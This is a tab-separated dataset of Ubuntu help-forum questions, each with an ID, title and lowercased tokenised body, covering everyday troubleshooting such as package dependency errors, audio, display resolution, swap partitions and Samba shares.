497047	having trouble moving files to ~/bin	firstly apologies if this is a stupid question , i am completely new to ubuntu . i 've tried googling for the last hour but there is nothing that i can find that really explains this . i 've been searching around and it seems that the common place for binaries etc is ~/bin but i ca n't seem to locate the folder or move anything there in the terminal . if i try moving stuff there with mv folder ~/bin it just deletes it , so i can only assume that location does n't exist ? i also do n't seem to have the home/user path that i also see mentioned a lot .
497050	failed 14.04 install and bios problem	after upgrading to 14.04 lts from 12.04 lts , i received the error file not found grub rescue so my boot loader is stuffed and i need to repair it . i decided to use a live usb and repair from there . this is where my trouble really began . now i ca n't access the bios on my laptop . i can press escape and can see the options , but each time i choose an option ( e.g . f9 - boot device options ) , it wo n't proceed any further and returns to the grub error message . i 've followed hp 's instructions on accessing the bios with no success . my laptop is an hp envy 4 sleekbook .
497051	linux version of xcom wo n't work on ubuntu 14.04	every time i try running it , i get missing executable i tried deleting the app cache folder , re-installing both steam and xcom , and verifying the installation files . nothing worked . how do i make xcom work ?
497054	headphone not silencing onboard speaker after upgrade to 14.04	i just recently installed 14.04 on my laptop . under 12.04 everything worked fine , but then i had to reformat my computer due to a driver issue , so i did a full wipe and install ( not an upgrade , but a full wipe and reinstall ) and now i 'm having this audio problem . under 12.04 , when i plugged headphones into my computer , it would silence my onboard speakers and allow me to listen through the headphones . now the onboard speakers are not silenced , so i ca n't watch videos or listen to music alone in peace . i found a bug report section in the ubuntu wiki on reporting something like this , and it suggested i include the output from the following 2 commands , so here you go : lc_all=c cat /proc/asound/card*/codec # * | lc_all=c fgrep -- before-context=4 -- after-context=1 `` subsystem id '' codec : ati r6xx hdmi address : 0 afg function id : 0x1 ( unsol 0 ) vendor id : 0x1002aa01 subsystem id : 0x00aa0100 revision id : 0x100500 -- codec : conexant cx20756 address : 0 afg function id : 0x1 ( unsol 1 ) vendor id : 0x14f15114 subsystem id : 0x1179fa52 revision id : 0x100100 [ /code ] lc_all=c lspci -vvnn | lc_all=c fgrep -- after-context=1 `` audio device '' 00:01.1 audio device [ 0403 ] : advanced micro devices , inc. [ amd/ati ] device [ 1002:9840 ] subsystem : advanced micro devices , inc. [ amd/ati ] device [ 1002:9840 ] -- 00:14.2 audio device [ 0403 ] : advanced micro devices , inc. [ amd ] fch azalia controller [ 1022:780d ] ( rev 02 ) subsystem : toshiba america info systems device [ 1179 : fa56 ] edit : nevermind . turns out i did fix it using another howto , but i had to reboot my computer for the fix to take effect . for anyone who sees this in future and wants to fix it , add the following line to /etc/modprobe.d/alsa-base.conf : options snd-hda-intel model=auto probe_mask=1
497056	xfce clock issue	i 'm having some trouble with my new xubuntu 14.04 installation 's clock . it seems to be lagging behind by an hour . the date and hwclock commands are reporting the correct time . i even tried to change my timezone to a different one and the clock did n't change at all . any help on fixing this issue would be greatly appreciated . thanks .
497058	can not see anything in the viewport	whenever i open blender i can not see anything in the viewport : no grid , no objects , nothing . it was suggested that it might be a hardware issue , if so how do i fix it ? this is what i see :
497059	firefox , libreoffice are stuck in english . i want them in esperanto	i just performed a clean install of ubuntu 14.04 this week , using esperanto since the first startup . later i added interlingua , but esperanto is still second . anyway , i noticed that firefox was still in english and did some poking around . i found mozilla 's esperanto language pack , as well as an add-on which changes the language in about : config . after installing everything and restarting multiple times , nothing has changed . what should i do ?
497065	how to automatically forward all network connections through a proxy ?	i would like to forward all network connections of all applications through a proxy , even though the applications themselves may not have proxy support . is such a thing possible in desktop ubuntu ?
497066	how do i get my compiz window decorations back ?	recently , my window decorations disappeared from compiz in gnome flashback . i asked about this , and someone helpfully suggested i could get them back by putting metacity -- replace in my list of startup applications . this worked , however , i did not realize until later , that running metacity in this way would run in place of compiz , making all compiz features and functions cease to be available . another answer here on askubuntu suggested i use put gtk-window-decorator -- replace in the window decorations section of the compizconfig settings manager . however , this also does n't work , and if i run it from the command line , i get : gtk-window-decorator : error while loading shared libraries : libmetacity-private.so.0 : can not open shared object file : no such file or directory how do i keep compiz running and have window decorations ?
497067	how do i secure openvpn access server ?	i 'm at my wits end as to how i can possibly accomplish this goal . when you install openvpn access server you can manage everything over at https : / /my.ip.address : port/ my problem is that i want to make sure that https : / /my.ip.address : port/ can only be accessed by a specific ip - my own ip . i just want the openvpn web interface to be accessible by my ip . how may i accomplish that ?
497074	why does my mate interface in ubuntu 14.04 look like it 's from 1996 ?	i 've been having some trouble recently with gnome flashback , so i thought i 'd give mate a try . i had actually tried mate before on a different computer , and the interface was fairly slick looking , with a sort of brushed metal style look . however , after installing it on ubuntu 14.04 , it looks all clunky and weird , like how linux x managers used to look over a decade ago : how do i reset mate to use a more up to date style ?
497075	b43-fwcutter wo n't install on my ubuntu	i am doing an offline installation and i got the .deb package for b43-fwcutter and it shows the install button but i can not click it
497077	ca n't use ubuntu software center or update ubuntu 14.04	i ca n't seem to be able to install anything with the ubuntu software center or update my ubuntu version . when i run sudo apt-get -f install this is the output : matt @ bessie : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : kde-l10n-engb use 'apt-get autoremove ' to remove it . 0 upgraded , 0 newly installed , 0 to remove and 309 not upgraded . 5 not fully installed or removed . need to get 0 b/28.9 mb of archives . after this operation , 0 b of additional disk space will be used . dpkg : error processing package oxygen-icon-theme ( -- configure ) : package oxygen-icon-theme is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : dependency problems prevent configuration of kde-runtime : kde-runtime depends on oxygen-icon-theme ( > = 4:4.6 ) ; however : package oxygen-icon-theme is not installed . dpkg : error processing package kde-runtime ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of qapt-batch : qapt-batch depends on kde-runtime ; however : package kde-runtime is not configured yet . dpkg : error processing package qapt-batch ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of kubuntu-debug-installer : kubuntu-debug-installer depends on kde-runtime ; however : package kde-runtime is not configured yet . kubuntu-debug-installer depends on qapt-batch ; however : package qapt-batch is not configured yet . dpkg : error processing package kubuntu-debug-installer ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates it 's a followup error from a previous failure . no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of quassel : quassel depends on kde-runtime ; however : package kde-runtime is not configured yet . dpkg : error processing package quassel ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : oxygen-icon-theme kde-runtime qapt-batch kubuntu-debug-installer quassel e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i do n't have much experience with this yet , so i do n't know what is going on . i 'm guessing it 's probably errors it lists , but i 'm not sure how to fix them .
497085	switching between 2 lรถve2d versions	perhaps i should ask this question in the game development qa . but i am using the lรถve2d engine on ubuntu 14.04 , and this is technically an os management situation , so here it goes : situation the current version ( the one i installed ) is 0.9.1 , but some projects will only run with version 0.8.* . i know i can install different versions of the engine . question how do i install another version alongside the current one ? and how do i switch between versions ?
497086	recovering apache after a botched upgrade attempt	i am running ubuntu 12.04 lts . i wanted to upgrade php to php 5.4 and followed the instructions on this page : http : //www.pixelite.co.nz/article/upgrading-php-54-ubuntu-1204-lts-support-drupal-8 by doing : sudo add-apt-repository ppa : ondrej/php5 and upgrading . something went very wrong and apache is now unusable . doing configtest yields : apache2 : syntax error on line 210 of /etc/apache2/apache2.conf : syntax error on line 1 of /etc/apache2/mods-enabled/apreq.load : can not load /usr/lib/apache2/modules/mod_apreq2.so into server : /usr/lib/apache2/modules/mod_apreq2.so : can not open shared object file : no such file or directory i first removed the ppa , and then tried to install the missing package : $ sudo apt-get install libapache2-mod-apreq2 this resulted in : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . libapache2-mod-apreq2 : depends : apache2.2-common but it is not going to be installed e : unable to correct problems , you have held broken packages . doing this : $ sudo apt-get apache2.2-bin results in : `` you already have the latest version '' . doing this : $ sudo apt-get apache2.2-common results in : the following packages have unmet dependencies . apache2.2-common : depends : apache2.2-bin ( =2.2.22-1ubuntu1.6 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . clearly , the botched upgrade has introduced some sort of incompatiblity in the mix . i now just want to get back to were i was before tryimg to upgrade . i 've restored /etc/apache2/ from backup , but that has not resolved the issue . this question : ubuntu 12.04 : can not install apache2-common explains why it happens , but not how to recover .
497087	how to install ibm db2 drivers on ubuntu	i need assistance installing ibm db2 drivers onto ubuntu . using ubuntu 14.04 , i 'm attempting to create a simple web page that gets served by the node.js server-side framework . a server-side-javascript will be making a simple query to an ibm db2 9.5 database located on a windows server ( within the same lan as the ubuntu machine ) . i got node.js installed on ubuntu 14.04 using this command : sudo apt-get install nodejs nodejs-legacy npm then , unnecessarily , i added odbc support with this command : sudo apt-get install git unixodbc unixodbc-dev ; git clone git : //github.com/wankdanker/node-odbc.git ; cd node-odbc ; node-gyp configure build ; npm install odbc after this , i discovered there was a npm for getting ibm db2 accessible from node.js a prerequisite , though , is that i must first download and install the ibm db2 driver onto ubuntu . from the ibm website , i downloaded a file named : v9.5fp10_linuxx64_dsdriver.tar.gz i found these instructions for installing the ibm db2 driver . the instructions state : on linux and unix operating systems , ibm data server driver package is installed by running the installdsdriver command . however , the v9.5fp10_linuxx64_dsdriver.tar.gz file-archive does n't contain any command called installdsdriver and ubuntu does n't natively know this command . where and how can i execute this installdsdriver command ?
497088	how can i make jack to work with audio interface fca202 firewire ?	i 'd never get work this audio interface on ubuntu . this is what jack audio connection kit messages says when i put start : 01:04:50.646 jack está iniciándose ... 01:04:50.647 /usr/bin/jackd -t5000 -dfirewire -dhw:0 -r44100 -p128 -n3 can not connect to server socket err = no existe el archivo o el directorio can not connect to server socket jack server is not running or can not be started 01:04:50.695 jack se inició con pid=7172 . jackdmp 1.9.8 copyright 2001-2005 paul davis and others . copyright 2004-2011 grame . jackdmp comes with absolutely no warranty this is free software , and you are welcome to redistribute it under certain conditions ; see the file copying for details jack server starting in realtime mode with priority 10 libffado 2.999.0- built feb 17 2012 15:52:28 firewire err : ffado : error creating virtual device can not attach audio driver jackserver : :open ( ) failed with -1 failed to open server 01:04:50.802 jack ha sido detenido con estado 255 . 01:04:52.819 no puede conectarse al servidor jack como cliente . - la operación global falló . - no puede conectarse al servidor . por favor revise la ventana de mensajes para mas información . can not connect to server socket err = no existe el archivo o el directorio can not connect to server socket jack server is not running or can not be started
497089	how to share encrypted folders with samba	i just have encrypted my home folder and all of its subfolders . one of the subfolders was configured as a samba share : [ avo-home ] comment = avo 's home share path = /home/avo/share browsable = yes read only = no create mask = 0660 directory mask = 0770 valid users = avo now i noticed that this share is available from windows only if i logged in on my ubuntu server with ssh . otherwise , i can not connect to it . before i encrypted it , it used to be available regardless of the active ssh session . how to make this encrypted share available to windows clients without having to log in with ssh ?
497091	i ca n't open qt 4 designer on latest ubuntu	i click the icon , and it will flash but will not open . qt creator works , but i 'm trying to use python . i 've tried remove and install a couple times , but still nothing . i have downloaded pyqt4 , ubuntu-sdk , qt4 ( designer , linguist and assistant ) . i appreciate your help . tried designer-qt4 , result : designer-qt4 : symbol lookup error : /usr/lib/x86_64-linux-gnu/qt4/plugins/designer/libqcscintillaplugin.so : undefined symbol : _zn13qsciscintillac1ep7qwidget
497093	game for two players on one pc	i search a ( non online ) game for two players on one laptop . the game should be simple since my son has the mental age of a five year old child . it would be nice if the game could be controlled by two game controllers . i imagine something like a jump and run game or something like boulder dash .
497094	how do i resolve unmet dependencies installing noise on 14.04 ?	i 'm trying to install noise on my ubuntu 14.04 . i ran : $ sudo add-apt-repository ppa : elementary-os/daily and $ sudo apt-get update and received the following error : the following packages have unmet dependencies : noise : depends : libgranite2 ( > = 0.3.0~ ) but it is not going to be installed depends : libgtk-3-0 ( > = 3.11.6 ) but 3.10.8-0ubuntu1.1 is to be installed depends : libnoise-core0 ( = 0.3.0+r1636+pkg78~ubuntu0.3.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . how do i resolve this dependency issue ?
497096	if i change the de on ubuntu will my files be deleted ?	i 'm using ubuntu 14.04 with unity and i 'd like to switch the desktop environment to xfce instead of unity . i was wondering if my files ( pictures , music , pdfs ) will switch over or would they be deleted ? i 'm using this guide to switch from unity to xfce .
497097	how to install ubuntu with freedos already installed	i just bought a new notebook with free dos installed . i installed ubuntu 14.04 lts and i 've been stuck in disk partitioning for 6 hours ( even more ) . i 've explored questions about it and i knew that it 's normal to take a couple hours . but , i 'm afraid that it 's actually stuck . how do i know whether or not it 's stuck ? is there a way to see the progress ? p.s . when i chose 'try ubuntu ' , i got an error message 'the system is running in low-graphics mode ' . i pressed ok button , but it did nothing . does it have something to do with my question above ? ( edit : the error has nothing to do with the problem as stated by karel below . )
497099	swap partition shows as unknown in gparted	my swap partition does not seem to be operating properly . it worked fine yesterday , but seems to be inactive today . per lsb_release -a , running ubuntu 14.04 lts trusty on a compaq cq62 , dual booting windows 7 . i was going to post some images , but the site would not let me without 10 reputation . nice . that makes things complicated . so instead , here is what i did : i ran swapon -a and swapon -s first . i then ran gparted to see what was going on with my swap partition . i dug around this site and figured out that i should look at fstab and compare it to blkid . here are the details on what i found on each of these steps : did swapon -a with no error returned . swapon -s shows : filename type size used priority /dev/mapper/cryptswap1 partition 2025468 56 -1 gparted showed unknown for the swap partition and would not let me format as swap ( launched it using sudo , password ) . since i can not just show you a screen cap of gparted , here is what parted print shows : model : ata wdc wd2500bevt-6 ( scsi ) disk /dev/sda : 250gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 210mb 73.2gb 73.0gb primary ntfs boot 2 73.2gb 250gb 177gb extended 5 73.2gb 248gb 175gb logical ext4 6 248gb 250gb 2074mb logical that last one , number 6 , is supposed to be a swap partition . linux lives on 5 , of course , which is part of the same extended partition 2 that the swap partition is also on . windows lives on 1 . grub does work and dual boots defaulting to linux . in blkid , it shows a different id from fstab and calls it cryptswap instead of just swap . root @ darkstar1 : /home/darkstar # blkid /dev/sda1 : uuid= '' a84e02644e022c1e '' type= '' ntfs '' /dev/sda5 : uuid= '' c8635db4-5951-47fc-8f84-19b706a2e9ec '' type= '' ext4 '' /dev/mapper/cryptswap1 : uuid= '' 9b77fefd-115c-4bf2-8e17-52d1bcf58fee '' type= '' swap '' fstab looks like this : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda5 during installation uuid=c8635db4-5951-47fc-8f84-19b706a2e9ec / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation # uuid=c44f68cd-e433-462f-81dc-16b8e52c7abb none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 is cryptswap1 the same as my swap partition ? do i need to change my fstab to show the same id the blkid is showing for the cryptswap1 ? i need swap , as my computer only has 2 gb of ram and easily locks up when playing video online . when the swap was running yesterday , it ran smoothly with no problems whatsoever . i had just replaced my older ubuntu install with a xubuntu install . windows is on the first partition , linux and the swap are supposed to be on the second extended partition . i would rather have my home drive encrypted . xubuntu did not give me a choice to not have it encrypted when i installed it ( the boxes were prechecked in the installer and i could not uncheck them ) . so it should be encrypted . i think this might have something to do with my old install of ubuntu ( i was testing kde , xfce and gnome and decided to just reinstall with xubuntu since the swap never worked on the original install and i had numerous issues with the other window managers - xfce really is the best ) .
497104	does xfce have a sticky edges option or plugin ?	i 'm using two monitors and really enjoyed the sticky edges feature of gnome . does xfce have something similar ? sticky edges , in unity , meant that when moving the mouse between your two displays , it would stick to the edge of your current display initially , and if you kept moving it would finally pass the edge into the other display .
497107	how to install libinput 0.4.0 ?	i 'm using ubuntu gnome 14.04 and i tried installing libinput package from source . export wld= $ home/install git clone git : //anongit.freedesktop.org/wayland/libinput cd libinput ./autogen.sh -- prefix= $ wld sudo make ; sudo make install but apparently when i try to find the version number of libinput using dpkg dpkg -s libinput-dev | grep 'version' dpkg -s libinput0 | grep 'version' i get the following result respectively dpkg-query : package 'libinput-dev ' is not installed and no information is available use dpkg -- info ( = dpkg-deb -- info ) to examine archive files , and dpkg -- contents ( = dpkg-deb -- contents ) to list their contents . dpkg-query : package 'libinput0 ' is not installed and no information is available use dpkg -- info ( = dpkg-deb -- info ) to examine archive files , and dpkg -- contents ( = dpkg-deb -- contents ) to list their contents . the reason why i wanted to install it from source is that i want the latest version 0.4.0 of libinput which apparently is a requirement of weston - reference implementation of wayland since after they added support to libinput . this is the result that i get when i run autogen.sh for weston ./autogen.sh -- prefix= $ wld -- enable-libinput-backend -- disable-setuid-install -- -- -- -- configure : error : package requirements ( libinput > = 0.4.0 ) were not met : no package 'libinput ' found
497110	citrix client -- an error occurred while making the requested connection	i tried installing citrix client following : https : //help.ubuntu.com/community/citrixicaclienthowto but i am getting following error in google chrome : http : //support.citrix.com/article/ctx130480
497114	dell latitude e5440 sound	i just installed ubuntu 14.04 on my dell latitude e5440 but i am getting no sound . i 've check to ensure that the sound is not muted . alsamixer tells me it 's : an intel hda hdmi with and intel haswell hdmi chip any thoughts ?
497115	unresponsive trackpad , keyboard and blinking cursor in ubuntu 14.04	my ubuntu machine was working all right since a long time but today when i switched it on , it 's greeted me oddly , it allowed me to open my user id but after that it 's been ( kinda ) hijacked . the mouse cursor is blinking continuously , the trackpad on my pc refuses to allow me to move the mouse , even the keyboard has n't been responding and it 's been like that since the last 15 minutes i 've been unsuccessful in even shutting off my laptop , and now the only option left is to cut the power supply . how to fix this problem ?
497116	special characters in 14.04 with alt right	i was using right alt for special characters to my great satisfaction . now after upgrading to 14.04 not only it does n't work but the key is stubbornly launching the hud . worse : the keyboard settings now are changed and less user friendly and i ca n't change the function for right alt . furthermore , i find : shortcuts → typing → special characters key : disabled and that refuses to change whatever i do . the previous version was so easy to use ... . to cut a long story short : how to attribute to right alt the function special characters again ?
497119	how to fix a failed package operation error ?	launched the software center and i am getting this error : installarchives ( ) failed : e : invalid archive signature e : internal error , could not locate member control.tar . { gzbz2xzlzma } e : prior errors apply to /var/cache/apt/archives/libwayland-egl1-mesa_10.1.3-0ubuntu0.1_i386.deb e : invalid archive signature e : internal error , could not locate member control.tar . { gzbz2xzlzma } e : prior errors apply to /var/cache/apt/archives/libgles2-mesa_10.1.3-0ubuntu0.1_i386.deb debconf : apt-extracttemplates failed : no such file or directory e : invalid archive signature e : internal error , could not locate member control.tar . { gzbz2xzlzma } e : prior errors apply to /var/cache/apt/archives/libwayland-egl1-mesa_10.1.3-0ubuntu0.1_i386.deb e : invalid archive signature e : internal error , could not locate member control.tar . { gzbz2xzlzma } e : prior errors apply to /var/cache/apt/archives/libgles2-mesa_10.1.3-0ubuntu0.1_i386.deb debconf : apt-extracttemplates failed : no such file or directory e : invalid archive signature e : internal error , could not locate member control.tar . { gzbz2xzlzma } e : prior errors apply to /var/cache/apt/archives/libwayland-egl1-mesa_10.1.3-0ubuntu0.1_i386.deb e : invalid archive signature e : internal error , could not locate member control.tar . { gzbz2xzlzma } e : prior errors apply to /var/cache/apt/archives/libgles2-mesa_10.1.3-0ubuntu0.1_i386.deb debconf : apt-extracttemplates failed : no such file or directory dpkg-deb : error : `/var/cache/apt/archives/libwayland-egl1-mesa_10.1.3-0ubuntu0.1_i386.deb ' is not a debian format archive dpkg : error processing archive /var/cache/apt/archives/libwayland-egl1-mesa_10.1.3-0ubuntu0.1_i386.deb ( -- unpack ) : subprocess dpkg-deb -- control returned error exit status 2 dpkg-deb : error : `/var/cache/apt/archives/libgles2-mesa_10.1.3-0ubuntu0.1_i386.deb ' is not a debian format archive dpkg : error processing archive /var/cache/apt/archives/libgles2-mesa_10.1.3-0ubuntu0.1_i386.deb ( -- unpack ) : subprocess dpkg-deb -- control returned error exit status 2 errors were encountered while processing : /var/cache/apt/archives/libwayland-egl1-mesa_10.1.3-0ubuntu0.1_i386.deb /var/cache/apt/archives/libgles2-mesa_10.1.3-0ubuntu0.1_i386.deb dpkg : dependency problems prevent configuration of libegl1-mesa-drivers : i386 : libegl1-mesa-drivers : i386 depends on libwayland-egl1-mesa ( = 10.1.3-0ubuntu0.1 ) ; however : version of libwayland-egl1-mesa : i386 on system is 10.1.0-4ubuntu5 .
497122	find and exec in found folder	i 'm trying to find files containing *.nef and move them to a subdirectory name nef of the folder in which the file is found . i 've started testing with the following command , but this always copies to my current directory , which is my home folder . find testfolder/*.nef -exec mv nef \ ; in the man find section i 've read about using -execdir , but using this instead of -exec still has the same result . so the question is : how can i dynamically assume the currently found directory and mv found files to a sub-directory folder named nef ? ( which does not yet exist ) thanks in advance !
497123	backup software sources and reinstall : get latest versions of installed programs from the repository for new distribution	i 'm migrating from 12.04 to 14.04 . i have already backed up my installed software sources in 12.04 using sudo cp -r /etc/apt/sources.list* ~/ command from this question - best way to backup all settings , list of installed packages , tweaks , etc ? . if i replace the software sources and install the packages using sudo apt-get install dselect will i get the packages installed with the latest version that is meant for the new distribution ? for example , php 5.3 = > default version in 12.04 php 5.4 = > default version in 14.04 ( i need this version to be installed ) if i restore the sources.list to my new 14.04 installation using sudo cp -r ~/sources.list* /etc/apt/ and do a sudo apt-get update , which version of php ( or any other software ) do i get ? the latest ones meant for 14.04 or the ones installed in my 12.04 ? will all the instances of precise in my software sources be replaced with the new distribution code name or should it be done manually ? i have stopped my migration process confused on how this might behave . basically , i want all the latest version of the installed softwares from the repository that is meant for 14.04 . [ ps : i just want the latest version from the repository , not the latest stable versions of any of the packages that might require manual installation of binaries ]
497124	installing 403-ath_regd_optional.patch	i 'm new to patching and i need to install this patch https : //dev.openwrt.org/browser/trunk/package/kernel/mac80211/patches/rev=39442 this is supposed to patch backports-3.15.1-1 package as you can see it patches three files , drivers/net/wireless/ath/regd.c , drivers/net/wireless/ath/kconfig and .local-symbols i tried patch -np5 -i 403-ath_regd_optional.patch and patch -i 403-ath_regd_optional.patch and i get the same error ca n't find file to patch at input line 3 perhaps you should have used the -p or -- strip option ? the text leading up to this was : | -- - a/drivers/net/wireless/ath/regd.c |+++ b/drivers/net/wireless/ath/regd.c file to patch : however , if i entered the exact same file ( i.e . drivers/net/wireless/ath/regd.c ) it works why is that happening ? update i manually updated the files and replaced the old ones
497125	kernel panic occurs in ubuntu 14.04	i have dell inspiron n4050 . after installing ubuntu in my laptop and upgrading to 14.04 this kernel panic occur . it happens after every 15 or 30 minutes and my laptop reboots in 30 seconds . help me out to fix this error : mcelog : cpu 0 : machine check exception : 5 bank 2 : b200000000000014 hardware event . this is not a software error . cpu 0 bank 2 status b200000000000014 mcgstatus 5 r ! p ! inexact ! 60 : < 00000000c1659b05 > tsc 881356fe45 hardware event . this is not a software error . cpu 0 bank 0 tsc 881356fe45 time 1404919237 wed jul 9 16:20:37 2014 status 0 mcgstatus 0 cpuid vendor intel family 6 model 42 processor 0:206a7 time 1404919237 socket 0 apic 0 microcode 1b
497128	the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present	i got this error message while trying to install ubuntu 14.04 : the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present . i tried the answers to what to do about âthe disk drive for /dev/mapper/cryptswap1 is not ready yet or not presentâ ? , but they did n't work . all i want to know is what am i doing wrong ? ! what and how should i build my partitions to get a ready to use system without having to solve /dev/mapper/cryptswap1 problems right from the start ?
497134	ubuntu 14.04 with gtx 670 slow window animations	i have ubuntu 14.04 installed on an i5 2500k , 8gb ram and gtx 670 . the problem is that all the window animations are very slow . for example when trying to resize a window is like it will take hours to complete the action . i have already installed the latest nvidia drivers ( 340 ) . the weird thing is that whenever i change the driver ( to whatever else ) from `` additional drivers '' , then everything is great ( very smooth movement and window resizing ) , but after reboot everything is so slow again . any ideas ? here are some information . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - lspci -vnn | grep -i vga -a 12 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gk104 [ geforce gtx 670 ] [ 10de:1189 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : palit microsystems inc. device [ 1569:1189 ] flags : bus master , fast devsel , latency 0 , irq 49 memory at f9000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=128m ] memory at ee000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at af00 [ size=128 ] [ virtual ] expansion rom at e8000000 [ disabled ] [ size=512k ] capabilities : kernel driver in use : nvidia 01:00.1 audio device [ 0403 ] : nvidia corporation gk104 hdmi audio controller [ 10de:0e0a ] ( rev a1 ) subsystem : palit microsystems inc. device [ 1569:1189 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - glxinfo | grep opengl | grep renderer opengl renderer string : geforce gtx 670/pcie/sse2 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - thank you !
497135	custom resolution does n't add to display	i 'm trying to add custom resolution to display , but it wo n't add . what i 've tried so far : 1-firstly see my current resolutuins $ xrandr the output : screen 0 : minimum 8 x 8 , current 1024 x 768 , maximum 4096 x 4096 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) vga-0 connected primary 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0*+ 1360x768 60.0 59.8 1152x864 60.0 800x600 72.2 60.3 56.2 680x384 60.0 59.8 640x480 59.9 576x432 60.1 512x384 60.0 400x300 72.2 60.3 56.3 320x240 60.1 tv-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 disconnected ( normal left inverted right x axis y axis ) 2- trying to generate a `` modeline '' by using cvt ( 1280x768 ) $ cvt 1280 768 60 the output : # 1280x768 59.87 hz ( cvt ) hsync : 47.78 khz ; pclk : 79.50 mhz modeline `` 1280x768_60.00 '' 79.50 1280 1344 1472 1664 768 771 781 798 -hsync +vsync 3- now tell this to xrandr : $ sudo xrandr -- newmode `` 1280x768_60.00 '' 79.50 1280 1344 1472 1664 768 771 781 798 -hsync +vsync 4- finally : $ sudo xrandr -- addmode vga-0 `` 1280x768_60.00 '' the output : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 29 current serial number in output stream : 30 after i did all above steps , again : $ xrandr the output : screen 0 : minimum 8 x 8 , current 1024 x 768 , maximum 4096 x 4096 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) vga-0 connected primary 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0*+ 1360x768 60.0 59.8 1152x864 60.0 800x600 72.2 60.3 56.2 680x384 60.0 59.8 640x480 59.9 576x432 60.1 512x384 60.0 400x300 72.2 60.3 56.3 320x240 60.1 tv-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 disconnected ( normal left inverted right x axis y axis ) 1280x768_60.00 ( 0x27b ) 79.5mhz h : width 1280 start 1344 end 1472 total 1664 skew 0 clock 47.8khz v : height 768 start 771 end 781 total 798 clock 59.9hz as you can see my custom resolution ( 1280x768 ) does n't added ! any helps would be great .
497137	how to install ubuntu 14.04 along side windows 8.1 using doss partition	i have been using ubuntu since a long time . i used to dual-boot it with windows xp , which was very easy to set up via wubi . now , with windows 8.1 , i 'm unable to install on doss partitions . how can i set up the dual-boot ?
497139	how to completely uninstall mongodb 2.6.3 from ubuntu 13.04	i am running following command : sudo apt-get remove mongodb and its giving output : reading package lists ... done building dependency tree reading state information ... done package 'mongodb ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . but there is mongodb installed in my system , so how can i uninstall it.. ? ?
497140	problem with java server app . does n't start right anymore	first off , i 'm running ubuntu 14.4 , and i have n't updated in a while because updated breaks my ps3 controller recognition ( different problem ) i just got this app running today : http : //www.aioremote.net/home using their portable version usable in linux . i installed java in terminal , then i made the .jar file thing executable by right clicking on it . it worked for a little while . however after launching it for the 6th or 7th time today it launches to the tray thing and when i right click on it and select show/hide application , this little tiny itty bitty worthless `` window '' pops up . the program does n't function . screencap : https : //plus.google.com/photos/114128073434716065626/albums/6035450179966530465 ? authkey=cos2s5ckvvm1ea i have no idea what went wrong or what i should do . if anyone is wondering what the error thing is in the top right , i think it 's independent . it showed up after i installed java , and it says something about how wine is now missing dependencies . the program i 'm having trouble with was working after this error started showing up . edit : i forgot to mention : i installed an app called alacarte `` main menu '' from the software center in an attempt to make a .desktop executable for the .jar file . it did n't work . i kept creating a new shortcut thing , and it would n't show up so i uninstalled ( through the software center ) . edit 2 : i also forgot to mention that i deleted the entire folder it came in and redownloaded it from the dev source . same problem so it has to be something on my system .
497141	i want to disable touchscreen at startup	i am a complete newbie in ubuntu , and i just installed it in my laptop in less than a week ! the problem is : my asus vivobook s200e has a problem with its touchscreen , and keeps pressing the right side of the screen , even when untouched . i managed to disable it in the windows 8.1 , and the configuration is saved every time i restart the pc . but if i boot into ubuntu , the touchscreen is active again ( of course ) . i have to run this to the terminal to turn the touch off : xinput disable 'device name ' the touch would be off , but if i restart and boot into ubuntu , the touch is on again , so i have to type the script again at the start of my work with ubuntu . i find this annoying , and is there any way that i can run the script at every startup ? thanks in advance .
